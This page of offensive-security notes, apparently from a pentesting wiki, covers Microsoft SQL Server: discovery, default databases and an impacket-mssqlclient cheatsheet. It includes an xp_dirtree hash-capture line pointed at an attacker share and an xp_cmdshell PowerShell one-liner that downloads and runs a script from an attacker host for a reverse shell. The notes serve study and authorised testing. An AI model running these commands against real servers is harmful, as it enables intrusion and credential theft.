SQL Server

Microsoft SQL Server

# Discovery

Searching for and locating MSSQL installations inside the internal network can be achieved using UDP foot-printing. When MSSQL installs, it installs either on TCP port 1433 or a randomized dynamic TCP port. If the port is dynamically attributed, querying UDP port 1434 will provide us with information on the server including the TCP port on which the service is listening. msf > use auxiliary/scanner/mssql/mssql_ping

# Default Databases:

On every SQL Server instance there is a number of default system databases. Those are: - master - keeps the information for an instance of SQL Server. - msdb - used by SQL Server Agent. - model - template database copied for each new database. - resource - read only database that keeps system objects that are visible in every database on the server in sys schema. - tempdb - keeps temporary objects for SQL queries.

# impacket-mssqlclient command cheatsheet

- DB list - SELECT name FROM master.dbo.sysdatabases - Extract hash - exec xp_dirtree '\\10.10.14.5\SHARE' - Execute commands - https://docs.microsoft.com/en-us/sql/t-sql/statements/execute-as-transact-sql?view=sql-server-ver16 User should be a member of 'sysadmin' role. Query - select IS_SRVROLEMEMBER('sysadmin');

# Command Execution

- xp_cmdshell is a very powerful feature and disabled by default. xp_cmdshell can be enabled and disabled by using the Policy-Based Management or by executing sp_configure. - When it is called by a user that is not a member of the sysadmin fixed server role, xp_cmdshell connects to Windows by using the account name and password stored in the credential named ##xp_cmdshell_proxy_account##. If this proxy credential does not exist, xp_cmdshell will fail.

# Reverse Shell using impacket-mssqlclient [Observe the escape of quotes]
xp_cmdshell powershell iex(New-Object Net.WebClient).DownloadString(\"http://10.10.14.18:8000/ivs.ps1\")
PreviousBlind SQLi scriptNextC Sharp

Last updated